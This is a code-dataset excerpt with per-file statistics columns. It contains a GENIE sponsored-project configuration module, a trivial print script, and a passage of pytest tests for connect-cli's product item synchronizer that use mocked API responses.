| 22.333333 | 53 | 0.677612 | 94 | 670 | 4.829787 | 0.308511 | 0.066079 | 0.118943 | 0.145374 | 0.867841 | 0.867841 | 0.867841 | 0.867841 | 0.867841 | 0.867841 | 0 | 0.002012 | 0.258209 | 670 | 29 | 54 | 23.103448 | 0.911469 | 0.677612 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103448 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
741293be564c2c646d14961962ad78a43d250b1e | 5,082 | py | Python | geniesp/bpc_config.py | thomasyu888/GENIE-Sponsored-Projects | 3f2ae3a375f28e2b83a252ff3d0ea7ac4936e9fa | [
"MIT"
] | 1 | 2020-09-23T18:10:51.000Z | 2020-09-23T18:10:51.000Z | geniesp/bpc_config.py | thomasyu888/GENIE-Sponsored-Projects | 3f2ae3a375f28e2b83a252ff3d0ea7ac4936e9fa | [
"MIT"
] | null | null | null | geniesp/bpc_config.py | thomasyu888/GENIE-Sponsored-Projects | 3f2ae3a375f28e2b83a252ff3d0ea7ac4936e9fa | [
"MIT"
] | null | null | null | """
BPC configuration classes
>>> git clone https://github.com/cBioPortal/cbioportal.git
>>> python run_bpc.py NSCLC ../../cbioportal 1.1-consortium --staging
"""
from .bpc_redcap_export_mapping import BpcProjectRunner
class Brca(BpcProjectRunner):
"""NSCLC BPC sponsored project"""
# Sponsored project name
_SPONSORED_PROJECT = "BrCa"
# Redcap codes to cbioportal mapping synid and form key is in
_REDCAP_TO_CBIOMAPPING_SYNID = "syn25712693.33"
# Mapping from Synapse Table to form (derived files)
_DATA_TABLE_IDS = "syn22296821"
# Storage of not found samples
_SP_REDCAP_EXPORTS_SYNID = "syn21446571"
# main GENIE release folder (11.0-public)
_MG_RELEASE_SYNID = "syn26706564"
# Run `git rev-parse HEAD` in Genie_processing directory to
# obtain shadigest
_GITHUB_REPO = (
"https://github.com/Sage-Bionetworks/GENIE-Sponsored-Projects/"
# "tree/a672a70ad5195e6e8359325f5cea10bef384b2ff/"
# "geniesp/bpc_config.py"
)
class Crc(BpcProjectRunner):
"""NSCLC BPC sponsored project"""
# Sponsored project name
_SPONSORED_PROJECT = "CRC"
# Redcap codes to cbioportal mapping synid and form key is in
_REDCAP_TO_CBIOMAPPING_SYNID = "syn25712693.33"
# Mapping from Synapse Table to form (derived files)
# TODO: Make versioned
_DATA_TABLE_IDS = "syn22296821"
# Storage of not found samples
_SP_REDCAP_EXPORTS_SYNID = "syn21446571"
# main GENIE release folder (11.0-public)
_MG_RELEASE_SYNID = "syn26706564"
# Run `git rev-parse HEAD` in Genie_processing directory to
# obtain shadigest
_GITHUB_REPO = (
"https://github.com/Sage-Bionetworks/GENIE-Sponsored-Projects/"
# "tree/765a209402a0e4c8517ec826ddad1f05d842f54a/"
# "geniesp/bpc_config.py"
)
class Nsclc(BpcProjectRunner):
"""NSCLC BPC sponsored project"""
# Sponsored project name
_SPONSORED_PROJECT = "NSCLC"
# Redcap codes to cbioportal mapping synid and form key is in
_REDCAP_TO_CBIOMAPPING_SYNID = "syn25712693.33"
# Mapping from Synapse Table to form (derived files)
_DATA_TABLE_IDS = "syn22296821"
# Storage of not found samples
_SP_REDCAP_EXPORTS_SYNID = "syn21446571"
# main GENIE release folder (11.0-public)
_MG_RELEASE_SYNID = "syn26706564"
# Run `git rev-parse HEAD` in Genie_processing directory to
# obtain shadigest
_GITHUB_REPO = (
"https://github.com/Sage-Bionetworks/GENIE-Sponsored-Projects/"
# "tree/765a209402a0e4c8517ec826ddad1f05d842f54a/"
# "geniesp/bpc_config.py"
)
_exclude_files = ["data_timeline_labtest.txt"]
class Panc(BpcProjectRunner):
"""PANC BPC sponsored project"""
# Sponsored project name
_SPONSORED_PROJECT = "PANC"
# Redcap codes to cbioportal mapping synid and form key is in
_REDCAP_TO_CBIOMAPPING_SYNID = "syn25712693.33"
# Mapping from Synapse Table to form (derived files)
_DATA_TABLE_IDS = "syn22296821"
# Storage of not found samples
_SP_REDCAP_EXPORTS_SYNID = "syn21446571"
# main GENIE release folder (11.0-public)
_MG_RELEASE_SYNID = "syn26706564"
# Run `git rev-parse HEAD` in Genie_processing directory to
# obtain shadigest
_GITHUB_REPO = (
"https://github.com/Sage-Bionetworks/GENIE-Sponsored-Projects/"
# "tree/a672a70ad5195e6e8359325f5cea10bef384b2ff/"
# "geniesp/bpc_config.py"
)
class Prostate(BpcProjectRunner):
"""Prostate BPC sponsored project"""
# Sponsored project name
_SPONSORED_PROJECT = "Prostate"
# Redcap codes to cbioportal mapping synid and form key is in
_REDCAP_TO_CBIOMAPPING_SYNID = "syn25712693.33"
# Mapping from Synapse Table to form (derived files)
_DATA_TABLE_IDS = "syn22296821"
# Storage of not found samples
_SP_REDCAP_EXPORTS_SYNID = "syn21446571"
# main GENIE release folder (11.0-public)
_MG_RELEASE_SYNID = "syn26706564"
# Run `git rev-parse HEAD` in Genie_processing directory to
# obtain shadigest
_GITHUB_REPO = (
"https://github.com/Sage-Bionetworks/GENIE-Sponsored-Projects/"
# "tree/a672a70ad5195e6e8359325f5cea10bef384b2ff/"
# "geniesp/bpc_config.py"
)
class Bladder(BpcProjectRunner):
"""BLADDER BPC sponsored project"""
# Sponsored project name
_SPONSORED_PROJECT = "BLADDER"
# Redcap codes to cbioportal mapping synid and form key is in
_REDCAP_TO_CBIOMAPPING_SYNID = "syn25712693.33"
# Mapping from Synapse Table to form (derived files)
_DATA_TABLE_IDS = "syn22296821"
# Storage of not found samples
_SP_REDCAP_EXPORTS_SYNID = "syn21446571"
# main GENIE release folder (11.0-public)
_MG_RELEASE_SYNID = "syn26706564"
# Run `git rev-parse HEAD` in Genie_processing directory to
# obtain shadigest
_GITHUB_REPO = (
"https://github.com/Sage-Bionetworks/GENIE-Sponsored-Projects/"
# "tree/a672a70ad5195e6e8359325f5cea10bef384b2ff/"
# "geniesp/bpc_config.py"
)
_exclude_files = ["data_timeline_labtest.txt"]
| 35.788732 | 71 | 0.708973 | 589 | 5,082 | 5.893039 | 0.151104 | 0.082973 | 0.028234 | 0.048401 | 0.907808 | 0.906367 | 0.906367 | 0.906367 | 0.85883 | 0.85883 | 0 | 0.091988 | 0.20425 | 5,082 | 141 | 72 | 36.042553 | 0.76632 | 0.482881 | 0 | 0.666667 | 0 | 0 | 0.287461 | 0.019716 | 0 | 0 | 0 | 0.007092 | 0 | 1 | 0 | false | 0 | 0.017544 | 0 | 0.789474 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
7423c1e84d7b08ac0fdfc7e1b58f81398a75b855 | 108 | py | Python | ex2.py | SunWalter/Hard | 078579bb6344e7f34fff8f9ad9a8c8f7e1462400 | [
"Apache-2.0"
] | null | null | null | ex2.py | SunWalter/Hard | 078579bb6344e7f34fff8f9ad9a8c8f7e1462400 | [
"Apache-2.0"
] | null | null | null | ex2.py | SunWalter/Hard | 078579bb6344e7f34fff8f9ad9a8c8f7e1462400 | [
"Apache-2.0"
] | null | null | null | # this is a commend
print ("Testing a sentence") # this is a commend also.
print ("This is a # character")
| 27 | 55 | 0.685185 | 18 | 108 | 4.111111 | 0.5 | 0.243243 | 0.283784 | 0.378378 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.203704 | 108 | 3 | 56 | 36 | 0.860465 | 0.388889 | 0 | 0 | 0 | 0 | 0.619048 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
7450319861e37e19801e66cb9fbcfc29a9ddd916 | 33,904 | py | Python | tests/plugins/product/sync/test_items.py | maxipavlovic/connect-cli | 73989c076c6fb5b4562c61a351448b1c77556676 | [
"Apache-2.0"
] | 12 | 2020-10-10T10:53:16.000Z | 2022-02-16T10:15:56.000Z | tests/plugins/product/sync/test_items.py | maxipavlovic/connect-cli | 73989c076c6fb5b4562c61a351448b1c77556676 | [
"Apache-2.0"
] | 37 | 2020-09-28T12:00:52.000Z | 2021-12-20T12:38:25.000Z | tests/plugins/product/sync/test_items.py | maxipavlovic/connect-cli | 73989c076c6fb5b4562c61a351448b1c77556676 | [
"Apache-2.0"
] | 11 | 2020-11-04T18:17:01.000Z | 2022-02-23T08:18:07.000Z | import pytest
from connect.cli.plugins.product.sync.items import ItemSynchronizer
from connect.client import ConnectClient
def test_init(get_sync_items_env):
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
product_id = synchronizer.open('./tests/fixtures/items_sync.xlsx', 'Items')
assert product_id == 'PRD-276-377-545'
def test_skipped(get_sync_items_env):
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open('./tests/fixtures/items_sync.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 1
assert created == 0
assert updated == 0
assert errors == {}
@pytest.mark.parametrize(
('row_action',),
(
("delete",),
("update",),
),
)
def test_validate_row_errors_no_row_id(fs, get_sync_items_env, row_action):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['B2'].value = None
get_sync_items_env['Items']['C2'].value = row_action
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {
2: [f'one between the item `ID` or `MPN` is required for the `{row_action}` action.'],
}
def test_validate_delete_published_item(fs, get_sync_items_env):
get_sync_items_env['Items']['C2'].value = 'delete'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {
2: ['the item status must be `draft` for the `delete` action.'],
}
def test_validate_create_published_item(fs, get_sync_items_env):
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {
2: ['the `ID` must not be specified for the `create` action.'],
}
def test_validate_create_no_mpn(fs, get_sync_items_env):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['B2'].value = None
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {
2: ['the item `MPN` is required.'],
}
def test_validate_create_no_nome(fs, get_sync_items_env):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['D2'].value = None
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {
2: ['the item `Name` is required for the `create` action.'],
}
def test_validate_create_no_description(fs, get_sync_items_env):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['E2'].value = None
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {
2: ['the item `Description` is required for the `create` action.'],
}
def test_validate_create_strange_type(fs, get_sync_items_env):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['F2'].value = 'license'
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {
2: ['the item `Type` must be one between `reservation` or `ppu`, not `license`.'],
}
def test_validate_wrong_precision_reservation(fs, get_sync_items_env):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['G2'].value = 'decimal'
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {
2: ['for items of type `reservation` the `Precision` must be `integer`, not `decimal`.'],
}
def test_validate_wrong_precision_ppu(fs, get_sync_items_env):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['F2'].value = 'ppu'
get_sync_items_env['Items']['G2'].value = 'decimal(12)'
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {
2: ['the item `Precision` must be one between `integer`, `decimal(1)`, `decimal(2)`, '
'`decimal(4)`, `decimal(8)`, not `decimal(12)`.'],
}
def test_validate_wrong_period_ppu(fs, get_sync_items_env):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['F2'].value = 'ppu'
get_sync_items_env['Items']['I2'].value = 'yearly'
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {
2: ['for items of type `ppu` the `Billing period` must be `monthly`, not `yearly`.'],
}
def test_validate_wrong_period_reservation(fs, get_sync_items_env):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['I2'].value = 'century'
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {
2: ['the item `Billing period` must be one between `onetime`, `monthly`, `yearly`, '
'`2 years`, `3 years`, `4 years`, `5 years`, not `century`.'],
}
def test_create_item_exists_in_connect(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=100&offset=0',
json=[mocked_items_response[0]],
)
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {
2: ['Cannot create item: item with MPN `MPN-R-001` already exists with ID '
'`PRD-276-377-545-0001`.'],
}
def test_create_item_connect_exception(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=100&offset=0',
json=[],
)
mocked_responses.add(
method='POST',
url='https://localhost/public/v1/products/PRD-276-377-545/items',
status=500,
)
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {
2: ['500 - Internal Server Error: unexpected error.'],
}
def test_create_item(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=100&offset=0',
json=[],
)
mocked_responses.add(
method='POST',
url='https://localhost/public/v1/products/PRD-276-377-545/items',
json=mocked_items_response[0],
)
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 1
assert updated == 0
assert errors == {}
def test_create_item_one_time(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env['Items']['I2'].value = 'onetime'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=100&offset=0',
json=[],
)
mocked_responses.add(
method='POST',
url='https://localhost/public/v1/products/PRD-276-377-545/items',
json=mocked_items_response[0],
)
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 1
assert updated == 0
assert errors == {}
def test_create_item_yearly(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env['Items']['J2'].value = '1 year'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=100&offset=0',
json=[],
)
mocked_responses.add(
method='POST',
url='https://localhost/public/v1/products/PRD-276-377-545/items',
json=mocked_items_response[0],
)
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 1
assert updated == 0
assert errors == {}
def test_create_item_1_to_1_yearly(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env['Items']['I2'].value = 'yearly'
get_sync_items_env['Items']['J2'].value = '1 year'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=100&offset=0',
json=[],
)
mocked_responses.add(
method='POST',
url='https://localhost/public/v1/products/PRD-276-377-545/items',
json=mocked_items_response[0],
)
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 1
assert updated == 0
assert errors == {}
def test_create_item_validate_commitment(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env['Items']['I2'].value = 'yearly'
get_sync_items_env['Items']['J2'].value = 'commitment'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {
2: ['the item `Commitment` must be one between `-`, `1 year`, `2 years`, `3 years`, '
'`4 years`, `5 years`, not `commitment`.'],
}
def test_create_item_validate_commitment_ppu(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env['Items']['F2'].value = 'ppu'
get_sync_items_env['Items']['I2'].value = 'monthly'
get_sync_items_env['Items']['J2'].value = '1 year'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {
2: ['the commitment `1 year` is invalid for `ppu` items.'],
}
def test_create_item_validate_commitment_onetime(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env['Items']['F2'].value = 'reservation'
get_sync_items_env['Items']['I2'].value = 'onetime'
get_sync_items_env['Items']['J2'].value = '1 year'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {
2: ['the commitment `1 year` is invalid for `onetime` items.'],
}
def test_create_item_validate_commitment_wrong_multiyear(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env['Items']['F2'].value = 'reservation'
get_sync_items_env['Items']['I2'].value = '2 years'
get_sync_items_env['Items']['J2'].value = '3 years'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {
2: ['for a billing period of `2 years` the commitment must be one between `-`, `4 years`, '
' not 3 years.'],
}
def test_create_item_validate_commitment_wrong_multiyear_vs_commitment(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'create'
get_sync_items_env['Items']['F2'].value = 'reservation'
get_sync_items_env['Items']['I2'].value = '3 years'
get_sync_items_env['Items']['J2'].value = '5 years'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {
2: ['for a billing period of `3 years` the commitment must be `-`, not 5 years.'],
}
def test_update_item(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'update'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=100&offset=0',
json=[mocked_items_response[0]],
)
mocked_responses.add(
method='PUT',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
json=mocked_items_response[0],
)
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 1
assert errors == {}
def test_delete_item(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'delete'
get_sync_items_env['Items']['k2'].value = 'draft'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=100&offset=0',
json=[mocked_items_response[0]],
)
mocked_responses.add(
method='DELETE',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
json={},
)
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert deleted == 1
assert errors == {}
def test_update_item_no_connect_item(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'update'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=100&offset=0',
json=[],
)
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
skipped, created, updated, deleted, errors = synchronizer.sync()
assert skipped == 0
assert created == 0
assert updated == 0
assert errors == {
2: ['Cannot update item: item with MPN `MPN-R-001` the item does not exist.'],
}
def test_update_item_no_item_connect(
fs,
get_sync_items_env,
mocked_responses,
mocked_items_response,
):
get_sync_items_env['Items']['A2'].value = None
get_sync_items_env['Items']['C2'].value = 'update'
get_sync_items_env.save(f'{fs.root_path}/test.xlsx')
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=100&offset=0',
json=[],
)
synchronizer = ItemSynchronizer(
client=ConnectClient(
use_specs=False,
api_key='ApiKey SU:123',
endpoint='https://localhost/public/v1',
),
silent=True,
)
synchronizer.open(f'{fs.root_path}/test.xlsx', 'Items')
